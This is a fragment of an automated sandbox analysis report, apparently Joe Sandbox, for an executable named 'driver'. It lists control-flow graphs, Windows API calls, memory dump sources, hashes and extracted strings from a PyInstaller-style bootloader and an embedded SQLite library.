7ff8a86b13a0 1629->1632 1630->1629 1635 7ff8a86d4885-7ff8a86d4895 1631->1635 1636 7ff8a86d4876-7ff8a86d487e 1631->1636 1632->1609 1635->1609 1636->1609 1638 7ff8a86d4880-7ff8a86d4883 1636->1638 1638->1609 1638->1635
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                                • API String ID: 22509725-879093740
                                                                                                                                                                                                                                                • Opcode ID: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
                                                                                                                                                                                                                                                • Instruction ID: 7dfa659a820e6461c06157e2a3f9248ffcdd7427764bd6771a4c4a6e3685c484
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE1DF22E0EB92A6FB14CB2585482BC27A1FB45BC8F055235CE0D1B791DF3CE852C764

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1639 7ff6a29b1210-7ff6a29b126d call 7ff6a29bbdf0 1642 7ff6a29b126f-7ff6a29b1296 call 7ff6a29b2710 1639->1642 1643 7ff6a29b1297-7ff6a29b12af call 7ff6a29c4fb4 1639->1643 1648 7ff6a29b12b1-7ff6a29b12cf call 7ff6a29c4f78 call 7ff6a29b2910 1643->1648 1649 7ff6a29b12d4-7ff6a29b12e4 call 7ff6a29c4fb4 1643->1649 1660 7ff6a29b1439-7ff6a29b146d call 7ff6a29bbad0 call 7ff6a29c4fa0 * 2 1648->1660 1655 7ff6a29b1309-7ff6a29b131b 1649->1655 1656 7ff6a29b12e6-7ff6a29b1304 call 7ff6a29c4f78 call 7ff6a29b2910 1649->1656 1659 7ff6a29b1320-7ff6a29b1345 call 7ff6a29c040c 1655->1659 1656->1660 1668 7ff6a29b1431 1659->1668 1669 7ff6a29b134b-7ff6a29b1355 call 7ff6a29c0180 1659->1669 1668->1660 1669->1668 1675 7ff6a29b135b-7ff6a29b1367 1669->1675 1677 7ff6a29b1370-7ff6a29b1398 call 7ff6a29ba230 1675->1677 1680 7ff6a29b1416-7ff6a29b142c call 7ff6a29b2710 1677->1680 1681 7ff6a29b139a-7ff6a29b139d 1677->1681 1680->1668 1682 7ff6a29b1411 1681->1682 1683 7ff6a29b139f-7ff6a29b13a9 1681->1683 1682->1680 1685 7ff6a29b13d4-7ff6a29b13d7 1683->1685 1686 7ff6a29b13ab-7ff6a29b13b9 call 7ff6a29c0b4c 1683->1686 1688 7ff6a29b13d9-7ff6a29b13e7 call 7ff6a29d9ea0 1685->1688 1689 7ff6a29b13ea-7ff6a29b13ef 1685->1689 1692 7ff6a29b13be-7ff6a29b13c1 1686->1692 1688->1689 1689->1677 1691 7ff6a29b13f5-7ff6a29b13f8 1689->1691 1694 7ff6a29b140c-7ff6a29b140f 1691->1694 1695 7ff6a29b13fa-7ff6a29b13fd 1691->1695 1696 7ff6a29b13cf-7ff6a29b13d2 1692->1696 1697 7ff6a29b13c3-7ff6a29b13cd call 7ff6a29c0180 1692->1697 1694->1668 1695->1680 1698 7ff6a29b13ff-7ff6a29b1407 1695->1698 1696->1680 1697->1689 1697->1696 1698->1659
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                • Opcode ID: dd90a4479ba71e44dedb97b9a062242b20196015a5516087af12020732465272
                                                                                                                                                                                                                                                • Instruction ID: 00d43df6436f02759240de2d845d39454300c9a40c99d6ae1f0535fa5bbe4620
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd90a4479ba71e44dedb97b9a062242b20196015a5516087af12020732465272
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C51C322A4A64286EA609B13A4503BA6291FF85F98F844135ED4DC7BD7EFBCE501E700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF6A29B3804), ref: 00007FF6A29B36E1
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B3804), ref: 00007FF6A29B36EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2C50: MessageBoxW.USER32 ref: 00007FF6A29B2D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                • Instruction ID: a38038be8dc44f9f10bcded8a5fb8c6cbd58bcb52eb1dff2abb6d5f16e8876be
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F421B661F9E64281FA20D722E8513BA2294FF88F9DF804136E55DC29D7EEACE504E704

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1941 7ff6a29cbacc-7ff6a29cbaf2 1942 7ff6a29cbaf4-7ff6a29cbb08 call 7ff6a29c4f58 call 7ff6a29c4f78 1941->1942 1943 7ff6a29cbb0d-7ff6a29cbb11 1941->1943 1957 7ff6a29cbefe 1942->1957 1944 7ff6a29cbee7-7ff6a29cbef3 call 7ff6a29c4f58 call 7ff6a29c4f78 1943->1944 1945 7ff6a29cbb17-7ff6a29cbb1e 1943->1945 1963 7ff6a29cbef9 call 7ff6a29ca950 1944->1963 1945->1944 1948 7ff6a29cbb24-7ff6a29cbb52 1945->1948 1948->1944 1950 7ff6a29cbb58-7ff6a29cbb5f 1948->1950 1954 7ff6a29cbb61-7ff6a29cbb73 call 7ff6a29c4f58 call 7ff6a29c4f78 1950->1954 1955 7ff6a29cbb78-7ff6a29cbb7b 1950->1955 1954->1963 1960 7ff6a29cbee3-7ff6a29cbee5 1955->1960 1961 7ff6a29cbb81-7ff6a29cbb87 1955->1961 1962 7ff6a29cbf01-7ff6a29cbf18 1957->1962 1960->1962 1961->1960 1965 7ff6a29cbb8d-7ff6a29cbb90 1961->1965 1963->1957 1965->1954 1968 7ff6a29cbb92-7ff6a29cbbb7 1965->1968 1970 7ff6a29cbbea-7ff6a29cbbf1 1968->1970 1971 7ff6a29cbbb9-7ff6a29cbbbb 1968->1971 1972 7ff6a29cbbf3-7ff6a29cbc1b call 7ff6a29cd66c call 7ff6a29ca9b8 * 2 1970->1972 1973 7ff6a29cbbc6-7ff6a29cbbdd call 7ff6a29c4f58 call 7ff6a29c4f78 call 7ff6a29ca950 1970->1973 1974 7ff6a29cbbe2-7ff6a29cbbe8 1971->1974 1975 7ff6a29cbbbd-7ff6a29cbbc4 1971->1975 2006 7ff6a29cbc1d-7ff6a29cbc33 call 7ff6a29c4f78 call 7ff6a29c4f58 1972->2006 2007 7ff6a29cbc38-7ff6a29cbc63 call 7ff6a29cc2f4 1972->2007 2003 7ff6a29cbd70 1973->2003 1977 7ff6a29cbc68-7ff6a29cbc7f 1974->1977 1975->1973 1975->1974 1980 7ff6a29cbc81-7ff6a29cbc89 1977->1980 1981 7ff6a29cbcfa-7ff6a29cbd04 call 7ff6a29d398c 1977->1981 1980->1981 1985 7ff6a29cbc8b-7ff6a29cbc8d 1980->1985 1992 7ff6a29cbd8e 1981->1992 1993 7ff6a29cbd0a-7ff6a29cbd1f 1981->1993 1985->1981 1989 7ff6a29cbc8f-7ff6a29cbca5 1985->1989 1989->1981 1994 7ff6a29cbca7-7ff6a29cbcb3 1989->1994 1996 7ff6a29cbd93-7ff6a29cbdb3 ReadFile 1992->1996 1993->1992 1998 7ff6a29cbd21-7ff6a29cbd33 GetConsoleMode 1993->1998 1994->1981 1999 7ff6a29cbcb5-7ff6a29cbcb7 1994->1999 2001 7ff6a29cbead-7ff6a29cbeb6 GetLastError 1996->2001 2002 7ff6a29cbdb9-7ff6a29cbdc1 1996->2002 1998->1992 2004 7ff6a29cbd35-7ff6a29cbd3d 1998->2004 1999->1981 2005 7ff6a29cbcb9-7ff6a29cbcd1 1999->2005 2012 7ff6a29cbed3-7ff6a29cbed6 2001->2012 2013 7ff6a29cbeb8-7ff6a29cbece call 7ff6a29c4f78 call 7ff6a29c4f58 2001->2013 2002->2001 2009 7ff6a29cbdc7 2002->2009 2014 7ff6a29cbd73-7ff6a29cbd7d call 7ff6a29ca9b8 2003->2014 2004->1996 2011 7ff6a29cbd3f-7ff6a29cbd61 ReadConsoleW 2004->2011 2005->1981 2015 7ff6a29cbcd3-7ff6a29cbcdf 2005->2015 2006->2003 2007->1977 2019 7ff6a29cbdce-7ff6a29cbde3 2009->2019 2021 7ff6a29cbd82-7ff6a29cbd8c 2011->2021 2022 7ff6a29cbd63 GetLastError 2011->2022 2017 7ff6a29cbedc-7ff6a29cbede 2012->2017 2018 7ff6a29cbd69-7ff6a29cbd6b call 7ff6a29c4eec 2012->2018 2013->2003 2014->1962 2015->1981 2025 7ff6a29cbce1-7ff6a29cbce3 2015->2025 2017->2014 2018->2003 2019->2014 2028 7ff6a29cbde5-7ff6a29cbdf0 2019->2028 2021->2019 2022->2018 2025->1981 2026 7ff6a29cbce5-7ff6a29cbcf5 2025->2026 2026->1981 2033 7ff6a29cbdf2-7ff6a29cbe0b call 7ff6a29cb6e4 2028->2033 2034 7ff6a29cbe17-7ff6a29cbe1f 2028->2034 2041 7ff6a29cbe10-7ff6a29cbe12 2033->2041 2037 7ff6a29cbe21-7ff6a29cbe33 2034->2037 2038 7ff6a29cbe9b-7ff6a29cbea8 call 7ff6a29cb524 2034->2038 2042 7ff6a29cbe35 2037->2042 2043 7ff6a29cbe8e-7ff6a29cbe96 2037->2043 2038->2041 2041->2014 2045 7ff6a29cbe3a-7ff6a29cbe41 2042->2045 2043->2014 2046 7ff6a29cbe43-7ff6a29cbe47 2045->2046 2047 7ff6a29cbe7d-7ff6a29cbe88 2045->2047 2048 7ff6a29cbe63 2046->2048 2049 7ff6a29cbe49-7ff6a29cbe50 2046->2049 2047->2043 2050 7ff6a29cbe69-7ff6a29cbe79 2048->2050 2049->2048 2051 7ff6a29cbe52-7ff6a29cbe56 2049->2051 2050->2045 2053 7ff6a29cbe7b 2050->2053 2051->2048 2052 7ff6a29cbe58-7ff6a29cbe61 2051->2052 2052->2050 2053->2043
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                                • Instruction ID: c0caccf4c443a235cef339b66d8bafa4e06562aa49e1c3b48daffdc604db38c5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58C1F662A8E68649E7609B1790202BE7752EF80F88F554131EA4E837D3CFFCF855A340

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 2131 7ff8a8688ff0-7ff8a8689002 2132 7ff8a8689004-7ff8a8689015 call 7ff8a8659350 2131->2132 2133 7ff8a8689017-7ff8a868901a 2131->2133 2140 7ff8a868903a-7ff8a8689070 call 7ff8a8659350 2132->2140 2135 7ff8a8689034 2133->2135 2136 7ff8a868901c-7ff8a8689032 call 7ff8a8659350 2133->2136 2139 7ff8a8689036-7ff8a8689038 2135->2139 2136->2139 2139->2140 2142 7ff8a8689071-7ff8a8689085 2139->2142 2144 7ff8a8689087 2142->2144 2145 7ff8a868908d-7ff8a8689090 call 7ff8a8688d60 2142->2145 2144->2145 2148 7ff8a8689095-7ff8a868909a 2145->2148 2149 7ff8a86890a0-7ff8a86890a5 2148->2149 2150 7ff8a86891bf-7ff8a86891cb 2148->2150 2151 7ff8a86890b0-7ff8a86890b7 2149->2151 2152 7ff8a86891d3-7ff8a86891e1 2150->2152 2153 7ff8a86891cd 2150->2153 2154 7ff8a86891ba 2151->2154 2155 7ff8a86890bd-7ff8a86890cd call 7ff8a86d54c0 2151->2155 2153->2152 2154->2150 2158 7ff8a86890f6-7ff8a8689100 2155->2158 2159 7ff8a86890cf-7ff8a86890d9 call 7ff8a8687ee0 2155->2159 2160 7ff8a8689102-7ff8a8689105 2158->2160 2161 7ff8a8689107-7ff8a868911c 2158->2161 2172 7ff8a86890e2-7ff8a86890ef call 7ff8a8688d60 2159->2172 2173 7ff8a86890db 2159->2173 2163 7ff8a868913e-7ff8a8689148 2160->2163 2164 7ff8a868912a-7ff8a868912d 2161->2164 2165 7ff8a868911e-7ff8a8689122 2161->2165 2170 7ff8a8689152-7ff8a8689156 2163->2170 2171 7ff8a868914a-7ff8a868914d call 7ff8a8656400 2163->2171 2168 7ff8a8689134-7ff8a868913b call 7ff8a8681530 2164->2168 2169 7ff8a868912f-7ff8a8689132 2164->2169 2165->2164 2167 7ff8a8689124-7ff8a8689128 2165->2167 2167->2163 2168->2163 2169->2163 2177 7ff8a8689158-7ff8a868915b 2170->2177 2178 7ff8a86891ab-7ff8a86891b7 2170->2178 2171->2170 2172->2151 2184 7ff8a86890f1 2172->2184 2173->2172 2181 7ff8a8689192-7ff8a86891a9 call 7ff8a8656d20 2177->2181 2182 7ff8a868915d 2177->2182 2178->2154 2181->2154 2185 7ff8a8689164-7ff8a868916d 2182->2185 2184->2154 2185->2185 2186 7ff8a868916f-7ff8a8689181 call 7ff8a8656880 2185->2186 2186->2181 2190 7ff8a8689183-7ff8a868918d 00007FF8B9F73010 2186->2190 2190->2181
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • 00007FF8B9F73010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FF8A86CD120), ref: 00007FF8A868918D
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                                • API String ID: 22509725-3538577999
                                                                                                                                                                                                                                                • Opcode ID: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
                                                                                                                                                                                                                                                • Instruction ID: 4a50e46ab6f97ccc86f561c53d0453ae33692bc18125e6e738206a3471898a32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5151F422F0F652A5FB549B61981C2B863A1EF41BD4F486135CE9D077C5EF3CE8428328
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                • Opcode ID: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
                                                                                                                                                                                                                                                • Instruction ID: aa9a573f4e193643605a188e915c880e9098a14ac765e0c876529104bbaf8b20
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31416531A5EA8791EA11DB22E4552F96351FF44B48F800132EA5DC369BEFBCF605E740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                                • Opcode ID: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
                                                                                                                                                                                                                                                • Instruction ID: ac23739165122abf5c0678f1a62847ebb7d27bb99e10e8d702bd7f1fbf30a09b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C102B431E0F682AAFB588B51A85877963A1FF84BC4F045235DD4F536A0CF3CE4848729
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010$FileRead
                                                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                • API String ID: 2521573588-1843600136
                                                                                                                                                                                                                                                • Opcode ID: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
                                                                                                                                                                                                                                                • Instruction ID: b335cb3acc29631abf77a1678ecc84752f71fbeecf37d07ce5286e1974446c5a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D413332A0E646AAF6149F25E8489BA7BA6FB547C4F446032EA4D437D4DF3CE4428358
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
